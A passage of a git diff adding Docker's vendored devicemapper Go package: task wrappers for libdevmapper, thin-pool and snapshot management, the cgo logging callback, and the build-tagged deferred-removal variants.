such device or address") +) + +var ( + dmSawBusy bool + dmSawExist bool + dmSawEnxio bool // No Such Device or Address +) + +type ( + // Task represents a devicemapper task (like lvcreate, etc.) ; a task is needed for each ioctl + // command to execute. + Task struct { + unmanaged *cdmTask + } + // Deps represents dependents (layer) of a device. + Deps struct { + Count uint32 + Filler uint32 + Device []uint64 + } + // Info represents information about a device. + Info struct { + Exists int + Suspended int + LiveTable int + InactiveTable int + OpenCount int32 + EventNr uint32 + Major uint32 + Minor uint32 + ReadOnly int + TargetCount int32 + DeferredRemove int + } + // TaskType represents a type of task + TaskType int + // AddNodeType represents a type of node to be added + AddNodeType int +) + +// DeviceIDExists returns whether error conveys the information about device Id already +// exist or not. This will be true if device creation or snap creation +// operation fails if device or snap device already exists in pool. +// Current implementation is little crude as it scans the error string +// for exact pattern match. Replacing it with more robust implementation +// is desirable. +func DeviceIDExists(err error) bool { + return fmt.Sprint(err) == fmt.Sprint(ErrDeviceIDExists) +} + +func (t *Task) destroy() { + if t != nil { + DmTaskDestroy(t.unmanaged) + runtime.SetFinalizer(t, nil) + } +} + +// TaskCreateNamed is a convenience function for TaskCreate when a name +// will be set on the task as well +func TaskCreateNamed(t TaskType, name string) (*Task, error) { + task := TaskCreate(t) + if task == nil { + return nil, fmt.Errorf("devicemapper: Can't create task of type %d", int(t)) + } + if err := task.setName(name); err != nil { + return nil, fmt.Errorf("devicemapper: Can't set task name %s", name) + } + return task, nil +} + +// TaskCreate initializes a devicemapper task of tasktype +func TaskCreate(tasktype TaskType) *Task { + Ctask := DmTaskCreate(int(tasktype)) + if Ctask == nil { + return nil + } + task := &Task{unmanaged: Ctask} + runtime.SetFinalizer(task, (*Task).destroy) + return task +} + +func (t *Task) run() error { + if res := DmTaskRun(t.unmanaged); res != 1 { + return ErrTaskRun + } + return nil +} + +func (t *Task) setName(name string) error { + if res := DmTaskSetName(t.unmanaged, name); res != 1 { + return ErrTaskSetName + } + return nil +} + +func (t *Task) setMessage(message string) error { + if res := DmTaskSetMessage(t.unmanaged, message); res != 1 { + return ErrTaskSetMessage + } + return nil +} + +func (t *Task) setSector(sector uint64) error { + if res := DmTaskSetSector(t.unmanaged, sector); res != 1 { + return ErrTaskSetSector + } + return nil +} + +func (t *Task) setCookie(cookie *uint, flags uint16) error { + if cookie == nil { + return ErrNilCookie + } + if res := DmTaskSetCookie(t.unmanaged, cookie, flags); res != 1 { + return ErrTaskSetCookie + } + return nil +} + +func (t *Task) setAddNode(addNode AddNodeType) error { + if addNode != addNodeOnResume && addNode != addNodeOnCreate { + return ErrInvalidAddNode + } + if res := DmTaskSetAddNode(t.unmanaged, addNode); res != 1 { + return ErrTaskSetAddNode + } + return nil +} + +func (t *Task) setRo() error { + if res := DmTaskSetRo(t.unmanaged); res != 1 { + return ErrTaskSetRo + } + return nil +} + +func (t *Task) addTarget(start, size uint64, ttype, params string) error { + if res := DmTaskAddTarget(t.unmanaged, start, size, + ttype, params); res != 1 { + return ErrTaskAddTarget + } + return nil +} + +func (t *Task) getDeps() (*Deps, error) { + var deps *Deps + if deps = DmTaskGetDeps(t.unmanaged); deps == nil { + return nil, ErrTaskGetDeps + } + return deps, nil +} + +func (t *Task) getInfo() (*Info, error) { + info := &Info{} + if res := DmTaskGetInfo(t.unmanaged, info); res != 1 { + return nil, ErrTaskGetInfo + } + return info, nil +} + +func (t *Task) getInfoWithDeferred() (*Info, error) { + info := &Info{} + if res := DmTaskGetInfoWithDeferred(t.unmanaged, info); res != 1 { + return nil, ErrTaskGetInfo + } + return info, nil +} + +func (t *Task) getDriverVersion() (string, error) { + res := DmTaskGetDriverVersion(t.unmanaged) + if res == "" { + return "", ErrTaskGetDriverVersion + } + return res, nil +} + +func (t *Task) getNextTarget(next unsafe.Pointer) (nextPtr unsafe.Pointer, start uint64, + length uint64, targetType string, params string) { + + return DmGetNextTarget(t.unmanaged, next, &start, &length, + &targetType, ¶ms), + start, length, targetType, params +} + +// UdevWait waits for any processes that are waiting for udev to complete the specified cookie. +func UdevWait(cookie *uint) error { + if res := DmUdevWait(*cookie); res != 1 { + logrus.Debugf("devicemapper: Failed to wait on udev cookie %d", *cookie) + return ErrUdevWait + } + return nil +} + +// LogInitVerbose is an interface to initialize the verbose logger for the device mapper library. +func LogInitVerbose(level int) { + DmLogInitVerbose(level) +} + +var dmLogger DevmapperLogger + +// LogInit initializes the logger for the device mapper library. +func LogInit(logger DevmapperLogger) { + dmLogger = logger + LogWithErrnoInit() +} + +// SetDevDir sets the dev folder for the device mapper library (usually /dev). +func SetDevDir(dir string) error { + if res := DmSetDevDir(dir); res != 1 { + logrus.Debug("devicemapper: Error dm_set_dev_dir") + return ErrSetDevDir + } + return nil +} + +// GetLibraryVersion returns the device mapper library version. +func GetLibraryVersion() (string, error) { + var version string + if res := DmGetLibraryVersion(&version); res != 1 { + return "", ErrGetLibraryVersion + } + return version, nil +} + +// UdevSyncSupported returns whether device-mapper is able to sync with udev +// +// This is essential otherwise race conditions can arise where both udev and +// device-mapper attempt to create and destroy devices. +func UdevSyncSupported() bool { + return DmUdevGetSyncSupport() != 0 +} + +// UdevSetSyncSupport allows setting whether the udev sync should be enabled. +// The return bool indicates the state of whether the sync is enabled. +func UdevSetSyncSupport(enable bool) bool { + if enable { + DmUdevSetSyncSupport(1) + } else { + DmUdevSetSyncSupport(0) + } + + return UdevSyncSupported() +} + +// CookieSupported returns whether the version of device-mapper supports the +// use of cookie's in the tasks. +// This is largely a lower level call that other functions use. +func CookieSupported() bool { + return DmCookieSupported() != 0 +} + +// RemoveDevice is a useful helper for cleaning up a device. +func RemoveDevice(name string) error { + task, err := TaskCreateNamed(deviceRemove, name) + if task == nil { + return err + } + + var cookie uint + if err := task.setCookie(&cookie, 0); err != nil { + return fmt.Errorf("devicemapper: Can not set cookie: %s", err) + } + defer UdevWait(&cookie) + + dmSawBusy = false // reset before the task is run + if err = task.run(); err != nil { + if dmSawBusy { + return ErrBusy + } + return fmt.Errorf("devicemapper: Error running RemoveDevice %s", err) + } + + return nil +} + +// RemoveDeviceDeferred is a useful helper for cleaning up a device, but deferred. +func RemoveDeviceDeferred(name string) error { + logrus.Debugf("devicemapper: RemoveDeviceDeferred START(%s)", name) + defer logrus.Debugf("devicemapper: RemoveDeviceDeferred END(%s)", name) + task, err := TaskCreateNamed(deviceRemove, name) + if task == nil { + return err + } + + if err := DmTaskDeferredRemove(task.unmanaged); err != 1 { + return ErrTaskDeferredRemove + } + + // set a task cookie and disable library fallback, or else libdevmapper will + // disable udev dm rules and delete the symlink under /dev/mapper by itself, + // even if the removal is deferred by the kernel. + var cookie uint + var flags uint16 + flags = DmUdevDisableLibraryFallback + if err := task.setCookie(&cookie, flags); err != nil { + return fmt.Errorf("devicemapper: Can not set cookie: %s", err) + } + + // libdevmapper and udev relies on System V semaphore for synchronization, + // semaphores created in `task.setCookie` will be cleaned up in `UdevWait`. + // So these two function call must come in pairs, otherwise semaphores will + // be leaked, and the limit of number of semaphores defined in `/proc/sys/kernel/sem` + // will be reached, which will eventually make all follwing calls to 'task.SetCookie' + // fail. + // this call will not wait for the deferred removal's final executing, since no + // udev event will be generated, and the semaphore's value will not be incremented + // by udev, what UdevWait is just cleaning up the semaphore. + defer UdevWait(&cookie) + + if err = task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running RemoveDeviceDeferred %s", err) + } + + return nil +} + +// CancelDeferredRemove cancels a deferred remove for a device. +func CancelDeferredRemove(deviceName string) error { + task, err := TaskCreateNamed(deviceTargetMsg, deviceName) + if task == nil { + return err + } + + if err := task.setSector(0); err != nil { + return fmt.Errorf("devicemapper: Can't set sector %s", err) + } + + if err := task.setMessage(fmt.Sprintf("@cancel_deferred_remove")); err != nil { + return fmt.Errorf("devicemapper: Can't set message %s", err) + } + + dmSawBusy = false + dmSawEnxio = false + if err := task.run(); err != nil { + // A device might be being deleted already + if dmSawBusy { + return ErrBusy + } else if dmSawEnxio { + return ErrEnxio + } + return fmt.Errorf("devicemapper: Error running CancelDeferredRemove %s", err) + + } + return nil +} + +// GetBlockDeviceSize returns the size of a block device identified by the specified file. +func GetBlockDeviceSize(file *os.File) (uint64, error) { + size, err := ioctlBlkGetSize64(file.Fd()) + if err != nil { + logrus.Errorf("devicemapper: Error getblockdevicesize: %s", err) + return 0, ErrGetBlockSize + } + return uint64(size), nil +} + +// BlockDeviceDiscard runs discard for the given path. +// This is used as a workaround for the kernel not discarding block so +// on the thin pool when we remove a thinp device, so we do it +// manually +func BlockDeviceDiscard(path string) error { + file, err := os.OpenFile(path, os.O_RDWR, 0) + if err != nil { + return err + } + defer file.Close() + + size, err := GetBlockDeviceSize(file) + if err != nil { + return err + } + + if err := ioctlBlkDiscard(file.Fd(), 0, size); err != nil { + return err + } + + // Without this sometimes the remove of the device that happens after + // discard fails with EBUSY. + syscall.Sync() + + return nil +} + +// CreatePool is the programmatic example of "dmsetup create". +// It creates a device with the specified poolName, data and metadata file and block size. +func CreatePool(poolName string, dataFile, metadataFile *os.File, poolBlockSize uint32) error { + task, err := TaskCreateNamed(deviceCreate, poolName) + if task == nil { + return err + } + + size, err := GetBlockDeviceSize(dataFile) + if err != nil { + return fmt.Errorf("devicemapper: Can't get data size %s", err) + } + + params := fmt.Sprintf("%s %s %d 32768 1 skip_block_zeroing", metadataFile.Name(), dataFile.Name(), poolBlockSize) + if err := task.addTarget(0, size/512, "thin-pool", params); err != nil { + return fmt.Errorf("devicemapper: Can't add target %s", err) + } + + var cookie uint + var flags uint16 + flags = DmUdevDisableSubsystemRulesFlag | DmUdevDisableDiskRulesFlag | DmUdevDisableOtherRulesFlag + if err := task.setCookie(&cookie, flags); err != nil { + return fmt.Errorf("devicemapper: Can't set cookie %s", err) + } + defer UdevWait(&cookie) + + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running deviceCreate (CreatePool) %s", err) + } + + return nil +} + +// ReloadPool is the programmatic example of "dmsetup reload". +// It reloads the table with the specified poolName, data and metadata file and block size. +func ReloadPool(poolName string, dataFile, metadataFile *os.File, poolBlockSize uint32) error { + task, err := TaskCreateNamed(deviceReload, poolName) + if task == nil { + return err + } + + size, err := GetBlockDeviceSize(dataFile) + if err != nil { + return fmt.Errorf("devicemapper: Can't get data size %s", err) + } + + params := fmt.Sprintf("%s %s %d 32768 1 skip_block_zeroing", metadataFile.Name(), dataFile.Name(), poolBlockSize) + if err := task.addTarget(0, size/512, "thin-pool", params); err != nil { + return fmt.Errorf("devicemapper: Can't add target %s", err) + } + + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running deviceCreate %s", err) + } + + return nil +} + +// GetDeps is the programmatic example of "dmsetup deps". +// It outputs a list of devices referenced by the live table for the specified device. +func GetDeps(name string) (*Deps, error) { + task, err := TaskCreateNamed(deviceDeps, name) + if task == nil { + return nil, err + } + if err := task.run(); err != nil { + return nil, err + } + return task.getDeps() +} + +// GetInfo is the programmatic example of "dmsetup info". +// It outputs some brief information about the device. +func GetInfo(name string) (*Info, error) { + task, err := TaskCreateNamed(deviceInfo, name) + if task == nil { + return nil, err + } + if err := task.run(); err != nil { + return nil, err + } + return task.getInfo() +} + +// GetInfoWithDeferred is the programmatic example of "dmsetup info", but deferred. +// It outputs some brief information about the device. +func GetInfoWithDeferred(name string) (*Info, error) { + task, err := TaskCreateNamed(deviceInfo, name) + if task == nil { + return nil, err + } + if err := task.run(); err != nil { + return nil, err + } + return task.getInfoWithDeferred() +} + +// GetDriverVersion is the programmatic example of "dmsetup version". +// It outputs version information of the driver. +func GetDriverVersion() (string, error) { + task := TaskCreate(deviceVersion) + if task == nil { + return "", fmt.Errorf("devicemapper: Can't create deviceVersion task") + } + if err := task.run(); err != nil { + return "", err + } + return task.getDriverVersion() +} + +// GetStatus is the programmatic example of "dmsetup status". +// It outputs status information for the specified device name. +func GetStatus(name string) (uint64, uint64, string, string, error) { + task, err := TaskCreateNamed(deviceStatus, name) + if task == nil { + logrus.Debugf("devicemapper: GetStatus() Error TaskCreateNamed: %s", err) + return 0, 0, "", "", err + } + if err := task.run(); err != nil { + logrus.Debugf("devicemapper: GetStatus() Error Run: %s", err) + return 0, 0, "", "", err + } + + devinfo, err := task.getInfo() + if err != nil { + logrus.Debugf("devicemapper: GetStatus() Error GetInfo: %s", err) + return 0, 0, "", "", err + } + if devinfo.Exists == 0 { + logrus.Debugf("devicemapper: GetStatus() Non existing device %s", name) + return 0, 0, "", "", fmt.Errorf("devicemapper: Non existing device %s", name) + } + + _, start, length, targetType, params := task.getNextTarget(unsafe.Pointer(nil)) + return start, length, targetType, params, nil +} + +// GetTable is the programmatic example for "dmsetup table". +// It outputs the current table for the specified device name. +func GetTable(name string) (uint64, uint64, string, string, error) { + task, err := TaskCreateNamed(deviceTable, name) + if task == nil { + logrus.Debugf("devicemapper: GetTable() Error TaskCreateNamed: %s", err) + return 0, 0, "", "", err + } + if err := task.run(); err != nil { + logrus.Debugf("devicemapper: GetTable() Error Run: %s", err) + return 0, 0, "", "", err + } + + devinfo, err := task.getInfo() + if err != nil { + logrus.Debugf("devicemapper: GetTable() Error GetInfo: %s", err) + return 0, 0, "", "", err + } + if devinfo.Exists == 0 { + logrus.Debugf("devicemapper: GetTable() Non existing device %s", name) + return 0, 0, "", "", fmt.Errorf("devicemapper: Non existing device %s", name) + } + + _, start, length, targetType, params := task.getNextTarget(unsafe.Pointer(nil)) + return start, length, targetType, params, nil +} + +// SetTransactionID sets a transaction id for the specified device name. +func SetTransactionID(poolName string, oldID uint64, newID uint64) error { + task, err := TaskCreateNamed(deviceTargetMsg, poolName) + if task == nil { + return err + } + + if err := task.setSector(0); err != nil { + return fmt.Errorf("devicemapper: Can't set sector %s", err) + } + + if err := task.setMessage(fmt.Sprintf("set_transaction_id %d %d", oldID, newID)); err != nil { + return fmt.Errorf("devicemapper: Can't set message %s", err) + } + + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running SetTransactionID %s", err) + } + return nil +} + +// SuspendDevice is the programmatic example of "dmsetup suspend". +// It suspends the specified device. +func SuspendDevice(name string) error { + task, err := TaskCreateNamed(deviceSuspend, name) + if task == nil { + return err + } + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running deviceSuspend %s", err) + } + return nil +} + +// ResumeDevice is the programmatic example of "dmsetup resume". +// It un-suspends the specified device. +func ResumeDevice(name string) error { + task, err := TaskCreateNamed(deviceResume, name) + if task == nil { + return err + } + + var cookie uint + if err := task.setCookie(&cookie, 0); err != nil { + return fmt.Errorf("devicemapper: Can't set cookie %s", err) + } + defer UdevWait(&cookie) + + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running deviceResume %s", err) + } + + return nil +} + +// CreateDevice creates a device with the specified poolName with the specified device id. +func CreateDevice(poolName string, deviceID int) error { + logrus.Debugf("devicemapper: CreateDevice(poolName=%v, deviceID=%v)", poolName, deviceID) + task, err := TaskCreateNamed(deviceTargetMsg, poolName) + if task == nil { + return err + } + + if err := task.setSector(0); err != nil { + return fmt.Errorf("devicemapper: Can't set sector %s", err) + } + + if err := task.setMessage(fmt.Sprintf("create_thin %d", deviceID)); err != nil { + return fmt.Errorf("devicemapper: Can't set message %s", err) + } + + dmSawExist = false // reset before the task is run + if err := task.run(); err != nil { + // Caller wants to know about ErrDeviceIDExists so that it can try with a different device id. + if dmSawExist { + return ErrDeviceIDExists + } + + return fmt.Errorf("devicemapper: Error running CreateDevice %s", err) + + } + return nil +} + +// DeleteDevice deletes a device with the specified poolName with the specified device id. +func DeleteDevice(poolName string, deviceID int) error { + task, err := TaskCreateNamed(deviceTargetMsg, poolName) + if task == nil { + return err + } + + if err := task.setSector(0); err != nil { + return fmt.Errorf("devicemapper: Can't set sector %s", err) + } + + if err := task.setMessage(fmt.Sprintf("delete %d", deviceID)); err != nil { + return fmt.Errorf("devicemapper: Can't set message %s", err) + } + + dmSawBusy = false + if err := task.run(); err != nil { + if dmSawBusy { + return ErrBusy + } + return fmt.Errorf("devicemapper: Error running DeleteDevice %s", err) + } + return nil +} + +// ActivateDevice activates the device identified by the specified +// poolName, name and deviceID with the specified size. +func ActivateDevice(poolName string, name string, deviceID int, size uint64) error { + return activateDevice(poolName, name, deviceID, size, "") +} + +// ActivateDeviceWithExternal activates the device identified by the specified +// poolName, name and deviceID with the specified size. +func ActivateDeviceWithExternal(poolName string, name string, deviceID int, size uint64, external string) error { + return activateDevice(poolName, name, deviceID, size, external) +} + +func activateDevice(poolName string, name string, deviceID int, size uint64, external string) error { + task, err := TaskCreateNamed(deviceCreate, name) + if task == nil { + return err + } + + var params string + if len(external) > 0 { + params = fmt.Sprintf("%s %d %s", poolName, deviceID, external) + } else { + params = fmt.Sprintf("%s %d", poolName, deviceID) + } + if err := task.addTarget(0, size/512, "thin", params); err != nil { + return fmt.Errorf("devicemapper: Can't add target %s", err) + } + if err := task.setAddNode(addNodeOnCreate); err != nil { + return fmt.Errorf("devicemapper: Can't add node %s", err) + } + + var cookie uint + if err := task.setCookie(&cookie, 0); err != nil { + return fmt.Errorf("devicemapper: Can't set cookie %s", err) + } + + defer UdevWait(&cookie) + + if err := task.run(); err != nil { + return fmt.Errorf("devicemapper: Error running deviceCreate (ActivateDevice) %s", err) + } + + return nil +} + +// CreateSnapDeviceRaw creates a snapshot device. Caller needs to suspend and resume the origin device if it is active. +func CreateSnapDeviceRaw(poolName string, deviceID int, baseDeviceID int) error { + task, err := TaskCreateNamed(deviceTargetMsg, poolName) + if task == nil { + return err + } + + if err := task.setSector(0); err != nil { + return fmt.Errorf("devicemapper: Can't set sector %s", err) + } + + if err := task.setMessage(fmt.Sprintf("create_snap %d %d", deviceID, baseDeviceID)); err != nil { + return fmt.Errorf("devicemapper: Can't set message %s", err) + } + + dmSawExist = false // reset before the task is run + if err := task.run(); err != nil { + // Caller wants to know about ErrDeviceIDExists so that it can try with a different device id. + if dmSawExist { + return ErrDeviceIDExists + } + return fmt.Errorf("devicemapper: Error running deviceCreate (createSnapDevice) %s", err) + } + + return nil +} + +// CreateSnapDevice creates a snapshot based on the device identified by the baseName and baseDeviceId, +func CreateSnapDevice(poolName string, deviceID int, baseName string, baseDeviceID int) error { + devinfo, _ := GetInfo(baseName) + doSuspend := devinfo != nil && devinfo.Exists != 0 + + if doSuspend { + if err := SuspendDevice(baseName); err != nil { + return err + } + } + + if err := CreateSnapDeviceRaw(poolName, deviceID, baseDeviceID); err != nil { + if doSuspend { + if err2 := ResumeDevice(baseName); err2 != nil { + return fmt.Errorf("CreateSnapDeviceRaw Error: (%v): ResumeDevice Error: (%v)", err, err2) + } + } + return err + } + + if doSuspend { + if err := ResumeDevice(baseName); err != nil { + return err + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go new file mode 100644 index 0000000000..8477e36fec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_log.go @@ -0,0 +1,35 @@ +// +build linux + +package devicemapper + +import "C" + +import ( + "strings" +) + +// Due to the way cgo works this has to be in a separate file, as devmapper.go has +// definitions in the cgo block, which is incompatible with using "//export" + +// DevmapperLogCallback exports the devmapper log callback for cgo. +//export DevmapperLogCallback +func DevmapperLogCallback(level C.int, file *C.char, line C.int, dmErrnoOrClass C.int, message *C.char) { + msg := C.GoString(message) + if level < 7 { + if strings.Contains(msg, "busy") { + dmSawBusy = true + } + + if strings.Contains(msg, "File exists") { + dmSawExist = true + } + + if strings.Contains(msg, "No such device or address") { + dmSawEnxio = true + } + } + + if dmLogger != nil { + dmLogger.DMLog(int(level), C.GoString(file), int(line), int(dmErrnoOrClass), msg) + } +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go new file mode 100644 index 0000000000..91fbc85b3a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper.go @@ -0,0 +1,251 @@ +// +build linux + +package devicemapper + +/* +#cgo LDFLAGS: -L. -ldevmapper +#include +#include // FIXME: present only for BLKGETSIZE64, maybe we can remove it? + +// FIXME: Can't we find a way to do the logging in pure Go? +extern void DevmapperLogCallback(int level, char *file, int line, int dm_errno_or_class, char *str); + +static void log_cb(int level, const char *file, int line, int dm_errno_or_class, const char *f, ...) +{ + char buffer[256]; + va_list ap; + + va_start(ap, f); + vsnprintf(buffer, 256, f, ap); + va_end(ap); + + DevmapperLogCallback(level, (char *)file, line, dm_errno_or_class, buffer); +} + +static void log_with_errno_init() +{ + dm_log_with_errno_init(log_cb); +} +*/ +import "C" + +import ( + "reflect" + "unsafe" +) + +type ( + cdmTask C.struct_dm_task +) + +// IOCTL consts +const ( + BlkGetSize64 = C.BLKGETSIZE64 + BlkDiscard = C.BLKDISCARD +) + +// Devicemapper cookie flags. +const ( + DmUdevDisableSubsystemRulesFlag = C.DM_UDEV_DISABLE_SUBSYSTEM_RULES_FLAG + DmUdevDisableDiskRulesFlag = C.DM_UDEV_DISABLE_DISK_RULES_FLAG + DmUdevDisableOtherRulesFlag = C.DM_UDEV_DISABLE_OTHER_RULES_FLAG + DmUdevDisableLibraryFallback = C.DM_UDEV_DISABLE_LIBRARY_FALLBACK +) + +// DeviceMapper mapped functions. +var ( + DmGetLibraryVersion = dmGetLibraryVersionFct + DmGetNextTarget = dmGetNextTargetFct + DmLogInitVerbose = dmLogInitVerboseFct + DmSetDevDir = dmSetDevDirFct + DmTaskAddTarget = dmTaskAddTargetFct + DmTaskCreate = dmTaskCreateFct + DmTaskDestroy = dmTaskDestroyFct + DmTaskGetDeps = dmTaskGetDepsFct + DmTaskGetInfo = dmTaskGetInfoFct + DmTaskGetDriverVersion = dmTaskGetDriverVersionFct + DmTaskRun = dmTaskRunFct + DmTaskSetAddNode = dmTaskSetAddNodeFct + DmTaskSetCookie = dmTaskSetCookieFct + DmTaskSetMessage = dmTaskSetMessageFct + DmTaskSetName = dmTaskSetNameFct + DmTaskSetRo = dmTaskSetRoFct + DmTaskSetSector = dmTaskSetSectorFct + DmUdevWait = dmUdevWaitFct + DmUdevSetSyncSupport = dmUdevSetSyncSupportFct + DmUdevGetSyncSupport = dmUdevGetSyncSupportFct + DmCookieSupported = dmCookieSupportedFct + LogWithErrnoInit = logWithErrnoInitFct + DmTaskDeferredRemove = dmTaskDeferredRemoveFct + DmTaskGetInfoWithDeferred = dmTaskGetInfoWithDeferredFct +) + +func free(p *C.char) { + C.free(unsafe.Pointer(p)) +} + +func dmTaskDestroyFct(task *cdmTask) { + C.dm_task_destroy((*C.struct_dm_task)(task)) +} + +func dmTaskCreateFct(taskType int) *cdmTask { + return (*cdmTask)(C.dm_task_create(C.int(taskType))) +} + +func dmTaskRunFct(task *cdmTask) int { + ret, _ := C.dm_task_run((*C.struct_dm_task)(task)) + return int(ret) +} + +func dmTaskSetNameFct(task *cdmTask, name string) int { + Cname := C.CString(name) + defer free(Cname) + + return int(C.dm_task_set_name((*C.struct_dm_task)(task), Cname)) +} + +func dmTaskSetMessageFct(task *cdmTask, message string) int { + Cmessage := C.CString(message) + defer free(Cmessage) + + return int(C.dm_task_set_message((*C.struct_dm_task)(task), Cmessage)) +} + +func dmTaskSetSectorFct(task *cdmTask, sector uint64) int { + return int(C.dm_task_set_sector((*C.struct_dm_task)(task), C.uint64_t(sector))) +} + +func dmTaskSetCookieFct(task *cdmTask, cookie *uint, flags uint16) int { + cCookie := C.uint32_t(*cookie) + defer func() { + *cookie = uint(cCookie) + }() + return int(C.dm_task_set_cookie((*C.struct_dm_task)(task), &cCookie, C.uint16_t(flags))) +} + +func dmTaskSetAddNodeFct(task *cdmTask, addNode AddNodeType) int { + return int(C.dm_task_set_add_node((*C.struct_dm_task)(task), C.dm_add_node_t(addNode))) +} + +func dmTaskSetRoFct(task *cdmTask) int { + return int(C.dm_task_set_ro((*C.struct_dm_task)(task))) +} + +func dmTaskAddTargetFct(task *cdmTask, + start, size uint64, ttype, params string) int { + + Cttype := C.CString(ttype) + defer free(Cttype) + + Cparams := C.CString(params) + defer free(Cparams) + + return int(C.dm_task_add_target((*C.struct_dm_task)(task), C.uint64_t(start), C.uint64_t(size), Cttype, Cparams)) +} + +func dmTaskGetDepsFct(task *cdmTask) *Deps { + Cdeps := C.dm_task_get_deps((*C.struct_dm_task)(task)) + if Cdeps == nil { + return nil + } + + // golang issue: https://github.com/golang/go/issues/11925 + hdr := reflect.SliceHeader{ + Data: uintptr(unsafe.Pointer(uintptr(unsafe.Pointer(Cdeps)) + unsafe.Sizeof(*Cdeps))), + Len: int(Cdeps.count), + Cap: int(Cdeps.count), + } + devices := *(*[]C.uint64_t)(unsafe.Pointer(&hdr)) + + deps := &Deps{ + Count: uint32(Cdeps.count), + Filler: uint32(Cdeps.filler), + } + for _, device := range devices { + deps.Device = append(deps.Device, uint64(device)) + } + return deps +} + +func dmTaskGetInfoFct(task *cdmTask, info *Info) int { + Cinfo := C.struct_dm_info{} + defer func() { + info.Exists = int(Cinfo.exists) + info.Suspended = int(Cinfo.suspended) + info.LiveTable = int(Cinfo.live_table) + info.InactiveTable = int(Cinfo.inactive_table) + info.OpenCount = int32(Cinfo.open_count) + info.EventNr = uint32(Cinfo.event_nr) + info.Major = uint32(Cinfo.major) + info.Minor = uint32(Cinfo.minor) + info.ReadOnly = int(Cinfo.read_only) + info.TargetCount = int32(Cinfo.target_count) + }() + return int(C.dm_task_get_info((*C.struct_dm_task)(task), &Cinfo)) +} + +func dmTaskGetDriverVersionFct(task *cdmTask) string { + buffer := C.malloc(128) + defer C.free(buffer) + res := C.dm_task_get_driver_version((*C.struct_dm_task)(task), (*C.char)(buffer), 128) + if res == 0 { + return "" + } + return C.GoString((*C.char)(buffer)) +} + +func dmGetNextTargetFct(task *cdmTask, next unsafe.Pointer, start, length *uint64, target, params *string) unsafe.Pointer { + var ( + Cstart, Clength C.uint64_t + CtargetType, Cparams *C.char + ) + defer func() { + *start = uint64(Cstart) + *length = uint64(Clength) + *target = C.GoString(CtargetType) + *params = C.GoString(Cparams) + }() + + nextp := C.dm_get_next_target((*C.struct_dm_task)(task), next, &Cstart, &Clength, &CtargetType, &Cparams) + return nextp +} + +func dmUdevSetSyncSupportFct(syncWithUdev int) { + (C.dm_udev_set_sync_support(C.int(syncWithUdev))) +} + +func dmUdevGetSyncSupportFct() int { + return int(C.dm_udev_get_sync_support()) +} + +func dmUdevWaitFct(cookie uint) int { + return int(C.dm_udev_wait(C.uint32_t(cookie))) +} + +func dmCookieSupportedFct() int { + return int(C.dm_cookie_supported()) +} + +func dmLogInitVerboseFct(level int) { + C.dm_log_init_verbose(C.int(level)) +} + +func logWithErrnoInitFct() { + C.log_with_errno_init() +} + +func dmSetDevDirFct(dir string) int { + Cdir := C.CString(dir) + defer free(Cdir) + + return int(C.dm_set_dev_dir(Cdir)) +} + +func dmGetLibraryVersionFct(version *string) int { + buffer := C.CString(string(make([]byte, 128))) + defer free(buffer) + defer func() { + *version = C.GoString(buffer) + }() + return int(C.dm_get_library_version(buffer, 128)) +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go new file mode 100644 index 0000000000..dc361eab76 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go @@ -0,0 +1,34 @@ +// +build linux,!libdm_no_deferred_remove + +package devicemapper + +/* +#cgo LDFLAGS: -L. -ldevmapper +#include +*/ +import "C" + +// LibraryDeferredRemovalSupport is supported when statically linked. +const LibraryDeferredRemovalSupport = true + +func dmTaskDeferredRemoveFct(task *cdmTask) int { + return int(C.dm_task_deferred_remove((*C.struct_dm_task)(task))) +} + +func dmTaskGetInfoWithDeferredFct(task *cdmTask, info *Info) int { + Cinfo := C.struct_dm_info{} + defer func() { + info.Exists = int(Cinfo.exists) + info.Suspended = int(Cinfo.suspended) + info.LiveTable = int(Cinfo.live_table) + info.InactiveTable = int(Cinfo.inactive_table) + info.OpenCount = int32(Cinfo.open_count) + info.EventNr = uint32(Cinfo.event_nr) + info.Major = uint32(Cinfo.major) + info.Minor = uint32(Cinfo.minor) + info.ReadOnly = int(Cinfo.read_only) + info.TargetCount = int32(Cinfo.target_count) + info.DeferredRemove = int(Cinfo.deferred_remove) + }() + return int(C.dm_task_get_info((*C.struct_dm_task)(task), &Cinfo)) +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go new file mode 100644 index 0000000000..8249ccf854 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go @@ -0,0 +1,15 @@ +// +build linux,libdm_no_deferred_remove + +package devicemapper + +// LibraryDeferredRemovalSupport is not supported when statically linked. +const LibraryDeferredRemovalSupport = false + +func dmTaskDeferredRemoveFct(task *cdmTask) int { + // Error. Nobody should be calling it. + return -1 +} + +func dmTaskGetInfoWithDeferredFct(task *cdmTask, info *Info) int { + return -1 +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go new file mode 100644 index 0000000000..581b57eb86 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go @@ -0,0 +1,27 @@ +// +build linux + +package devicemapper + +import ( + "syscall" + "unsafe" +) + +func ioctlBlkGetSize64(fd uintptr) (int64, error) { + var size int64 + if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkGetSize64, uintptr(unsafe.Pointer(&size))); err != 